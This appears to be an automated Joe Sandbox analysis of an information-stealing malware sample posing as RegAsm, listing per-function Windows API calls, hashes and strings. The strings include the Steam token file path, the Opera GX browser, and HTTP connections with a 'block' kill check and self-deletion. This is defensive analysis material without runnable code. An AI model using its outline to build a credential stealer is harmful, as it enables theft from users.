GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040E8DE,0040F3E9,?,?,?,004133DC,00000000,?,Windows: ,00000000), ref: 0040E880
HeapAlloc.KERNEL32(00000000,?,?,?,0040E8DE,0040F3E9,?,?,?,004133DC,00000000,?,Windows: ,00000000,?,00424428), ref: 0040E887
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040E8DE,0040F3E9,?,?,?,004133DC,00000000,?,Windows: ), ref: 0040E8A5
RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040E8DE,0040F3E9,?,?,?,004133DC,00000000), ref: 0040E8C0

Strings

CurrentBuildNumber, xrefs: 0040E8B8

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: f245f1a5fbb3bcbf1817930d0d22ef945f3eb32b02f2c90766712b82a3473776
Instruction ID: 996e46ad93e1047a7ffd0be31a036e5f3d08cb5a70cd59f05442ee8aac817961
Opcode Fuzzy Hash: f245f1a5fbb3bcbf1817930d0d22ef945f3eb32b02f2c90766712b82a3473776
Instruction Fuzzy Hash: BAF03072640204FBEB245BA1EC4BF6E7B7DEB84F05F201125F701A60D0E7B459019B68

Uniqueness

Uniqueness Score: -1.00%

Function 004093A2 Relevance: 7.8, APIs: 5, Instructions: 255filestringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004093A7

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040F870: _EH_prolog.MSVCRT ref: 0040F875
Part of subcall function 0040F870: GetSystemTime.KERNEL32(?,004242A8,00000001,00000000,00000000), ref: 0040F8B5

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?,00423AE2), ref: 00409449
lstrlen.KERNEL32(00000000), ref: 00409610
lstrlen.KERNEL32(00000000), ref: 00409624
DeleteFileA.KERNEL32(00000000), ref: 004096A3

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 3423466546-0
Opcode ID: 8c85b680785516db4629e8e1f8a424b33e9425085e6e6fa16d9de3fef5e297e2
Instruction ID: 8ae648a30327b2644a820ef24c5718470021b16630986db628039a20e1fd7356
Opcode Fuzzy Hash: 8c85b680785516db4629e8e1f8a424b33e9425085e6e6fa16d9de3fef5e297e2
Instruction Fuzzy Hash: 73B18231804148EACB09EBE6D955BDDBB74AF28308F50496EF402732C2EF785B19DB25

Uniqueness

Uniqueness Score: -1.00%

Function 6CBDC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6CBDC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CBDC969
GetSystemInfo.KERNEL32(?), ref: 6CBDC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CBDC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CBDC9E2

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 169e5a899758e7ac12d933938eb1feee052fd6e7ec4b4f9ad97884d1b1eaa03c
Instruction ID: d6f61e7e53252c87450da052b7d9fa36c4ea7b7c91eaf544a5cd398d4a863b46
Opcode Fuzzy Hash: 169e5a899758e7ac12d933938eb1feee052fd6e7ec4b4f9ad97884d1b1eaa03c
Instruction Fuzzy Hash: 1D21F635741614AFDB15BE64DC84BAE73B9EB46708FA1811AF907A7B80EB706C048791

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFCF Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 457COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040CFD4

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

StrCmpCA.SHLWAPI(00000000,Opera GX,00423B0B,00423B0A,?,?,?), ref: 0040D01E

Part of subcall function 0040FA35: SHGetFolderPathA.SHELL32(00000000,f;B,00000000,00000000,?), ref: 0040FA66

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 0040F9F1: _EH_prolog.MSVCRT ref: 0040F9F6
Part of subcall function 0040F9F1: GetFileAttributesA.KERNEL32(00000000,?,0040D3CF,?,?,?,?), ref: 0040FA0A

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 0040BBFC: _EH_prolog.MSVCRT ref: 0040BC01
Part of subcall function 0040BBFC: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC54
Part of subcall function 0040BBFC: memcmp.MSVCRT ref: 0040BC92

Strings

Opera GX, xrefs: 0040D006
#, xrefs: 0040D4E2

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
String ID: #$Opera GX
API String ID: 2375657845-1046280356
Opcode ID: eed6a1fa4410d3297040b25a9b788ecdff685f4e891abf802b403ea1ab65200c
Instruction ID: 490de2c519b396cfa38cbd201c96935d98327283955e7164dff2ae51ab5a58a2
Opcode Fuzzy Hash: eed6a1fa4410d3297040b25a9b788ecdff685f4e891abf802b403ea1ab65200c
Instruction Fuzzy Hash: F2028071C0028CEADF05EBE5D946ADDBBB8AF19308F50496EF401732C1EA785718D766

Uniqueness

Uniqueness Score: -1.00%

Function 00411D06 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411D0B
lstrlen.KERNEL32(00000000), ref: 00411D28
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00411DEC

Strings

ERROR, xrefs: 00411DE6

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrlen
String ID: ERROR
API String ID: 2133942097-2861137601
Opcode ID: 4cc503b74355bdd4f9288a563c266c2ef5c6b82267fb2c13523f502a1b5850cd
Instruction ID: d6c252f13a4617f7ad1570df099007441c7ea7cac36f3f0435f3b9ccf977c240
Opcode Fuzzy Hash: 4cc503b74355bdd4f9288a563c266c2ef5c6b82267fb2c13523f502a1b5850cd
Instruction Fuzzy Hash: 76316272900248EFCB04EFAAD846BDD7BB4AF14318F10842EF405B72D1DB389654C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00411A1D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411A22

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 0040532C: _EH_prolog.MSVCRT ref: 00405331
Part of subcall function 0040532C: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405394
Part of subcall function 0040532C: StrCmpCA.SHLWAPI(?), ref: 004053A8
Part of subcall function 0040532C: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004053CB
Part of subcall function 0040532C: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405401
Part of subcall function 0040532C: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405425
Part of subcall function 0040532C: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405430
Part of subcall function 0040532C: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040544E

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00411A7D

Strings

ERROR, xrefs: 00411AA5
ERROR, xrefs: 00411A6B

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 1120091252-2579291623
Opcode ID: 91f460ddf6bcaac76f045fdfdde7ac771a6177df3d1d165e4ade5bc1b708ee71
Instruction ID: 469977ef9a47d161048f8b2cbd7cac32d3bbaae7c79d94ae5ba790c070182d97
Opcode Fuzzy Hash: 91f460ddf6bcaac76f045fdfdde7ac771a6177df3d1d165e4ade5bc1b708ee71
Instruction Fuzzy Hash: E1219274900248EECB04EBE6C9467DC7BB4AF18348F50445EF815732C2DB789B18CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00414F14 Relevance: 6.5, APIs: 4, Instructions: 546networksleepCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00414F19

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 00411EDD: _EH_prolog.MSVCRT ref: 00411EE2

Part of subcall function 00411F80: _EH_prolog.MSVCRT ref: 00411F85

Part of subcall function 0040E5F4: lstrlen.KERNEL32(?,00000000,?,00414F6E,004243BA,004243B7,00000000,00000000,?,00415729), ref: 0040E5FD
Part of subcall function 0040E5F4: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E631

Part of subcall function 00415A5B: GetProcAddress.KERNEL32(76210000,00415033), ref: 00415A6F
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415A86
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415A9D
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415AB4
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415ACB
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415AE2
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415AF9
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415B10
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415B27
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415B3E
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415B55
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415B6C
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415B83
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415B9A
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415BB1
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415BC8
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415BDF
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415BF6
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415C0D
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415C24
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415C3B
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415C52
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415C69
Part of subcall function 00415A5B: GetProcAddress.KERNEL32(?,00415729), ref: 00415C80

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 004121E7: _EH_prolog.MSVCRT ref: 004121EC

Part of subcall function 00411C75: _EH_prolog.MSVCRT ref: 00411C7A

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00415127
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041513D

Part of subcall function 0040F253: _EH_prolog.MSVCRT ref: 0040F258
Part of subcall function 0040F253: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040F27B
Part of subcall function 0040F253: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F2AD
Part of subcall function 0040F253: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F2F0
Part of subcall function 0040F253: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F2F7

Part of subcall function 00403F1B: _EH_prolog.MSVCRT ref: 00403F20
Part of subcall function 00403F1B: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403FCB
Part of subcall function 00403F1B: StrCmpCA.SHLWAPI(?), ref: 00403FE2

Part of subcall function 004108DF: _EH_prolog.MSVCRT ref: 004108E4
Part of subcall function 004108DF: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,004151B2), ref: 00410906
Part of subcall function 004108DF: ExitProcess.KERNEL32 ref: 00410911

Part of subcall function 0040554E: _EH_prolog.MSVCRT ref: 00405553
Part of subcall function 0040554E: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004055FE
Part of subcall function 0040554E: StrCmpCA.SHLWAPI(?), ref: 00405615

Part of subcall function 004103CB: _EH_prolog.MSVCRT ref: 004103D0
Part of subcall function 004103CB: strtok_s.MSVCRT ref: 004103F7
Part of subcall function 004103CB: StrCmpCA.SHLWAPI(00000000,00424378,?,?,?,?,0041533E), ref: 00410428
Part of subcall function 004103CB: strtok_s.MSVCRT ref: 00410489

Part of subcall function 00401DD6: _EH_prolog.MSVCRT ref: 00401DDB

Part of subcall function 0040554E: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040579D
Part of subcall function 0040554E: HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004057D4

Part of subcall function 0041165A: _EH_prolog.MSVCRT ref: 0041165F
Part of subcall function 0041165A: strtok_s.MSVCRT ref: 00411686

Sleep.KERNEL32(000003E8), ref: 004154CC

Part of subcall function 0040554E: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004057F9

Part of subcall function 0041165A: strtok_s.MSVCRT ref: 004116C6

Part of subcall function 004120B7: _EH_prolog.MSVCRT ref: 004120BC
Part of subcall function 004120B7: memset.MSVCRT ref: 004120D9
Part of subcall function 004120B7: memset.MSVCRT ref: 004120E5
Part of subcall function 004120B7: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 004120FA
Part of subcall function 004120B7: ShellExecuteEx.SHELL32(0000003C), ref: 0041219B
Part of subcall function 004120B7: memset.MSVCRT ref: 004121A8
Part of subcall function 004120B7: memset.MSVCRT ref: 004121B6
Part of subcall function 004120B7: ExitProcess.KERNEL32 ref: 004121C7

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$H_prolog$Internetlstrcpy$Open$memsetstrtok_s$Process$ExitHeaplstrcatlstrlen$AllocConnectDirectoryExecuteFileHttpInformationModuleNameOptionRequestShellSleepVolumeWindows
String ID:
API String ID: 889611940-0
Opcode ID: c89bc77c972ab5999ecb6953bdb5f26424301c6ff91f643d5df5903c1adc7d6b
Instruction ID: fe4b7213f40a135cc3c091fd98f22f6d84a643e4809717e73fa4f04b18018b20
Opcode Fuzzy Hash: c89bc77c972ab5999ecb6953bdb5f26424301c6ff91f643d5df5903c1adc7d6b
Instruction Fuzzy Hash: 0D229471D00258EADB10EBA5CD47BDDBBB8BF54308F5045AFE54473281EB781B488BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00412DF0 Relevance: 6.1, APIs: 4, Instructions: 76sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412DF5

Part of subcall function 00411E40: _EH_prolog.MSVCRT ref: 00411E45

Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 00412E73
CreateThread.KERNEL32(00000000,00000000,00411D06,?,00000000,00000000), ref: 00412E95
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00412E9D

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$CreateObjectSingleSleepThreadWait
String ID:
API String ID: 2678630583-0
Opcode ID: 0781f3aec980ba46c2b4244cb220e1a05c96d63961bc15f62e29120cc285560b
Instruction ID: 494e63d853049931d52386eba90c4c94ddf19b56ac8686a4fc5aead72adca532
Opcode Fuzzy Hash: 0781f3aec980ba46c2b4244cb220e1a05c96d63961bc15f62e29120cc285560b
Instruction Fuzzy Hash: B5318475800248DFCB01DFE5D995ADDBBB8FF18304F10452EF802A3281DB789A49CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB34 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413901,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004244D8), ref: 0040EB48
HeapAlloc.KERNEL32(00000000,?,?,?,00413901,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004244D8,00000000,?), ref: 0040EB4F
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413901,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040EB6D
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413901,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040EB89

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 9faebf2de75bf63b99fbadaceea92aed034a018285eddf57d64b14fdac7aec56
Instruction ID: e3f04ec81fb0d82207db95a4a8b5f8b9dfd52d79b5d5dcd3a1f59ae813cd2a02
Opcode Fuzzy Hash: 9faebf2de75bf63b99fbadaceea92aed034a018285eddf57d64b14fdac7aec56
Instruction Fuzzy Hash: 25F05475640204FFEB149F91EC0EF6E7A7EEB44B54F101065FB01A51A0D7B19911DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00412EEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412EF0

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

lstrlen.KERNEL32(00000000,00000000,?,00000000,004243B6), ref: 00412F41

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00412DF0: _EH_prolog.MSVCRT ref: 00412DF5
Part of subcall function 00412DF0: CreateThread.KERNEL32(00000000,00000000,00411D06,?,00000000,00000000), ref: 00412E95
Part of subcall function 00412DF0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00412E9D

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Soft\Steam\steam_tokens.txt, xrefs: 00412F59

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
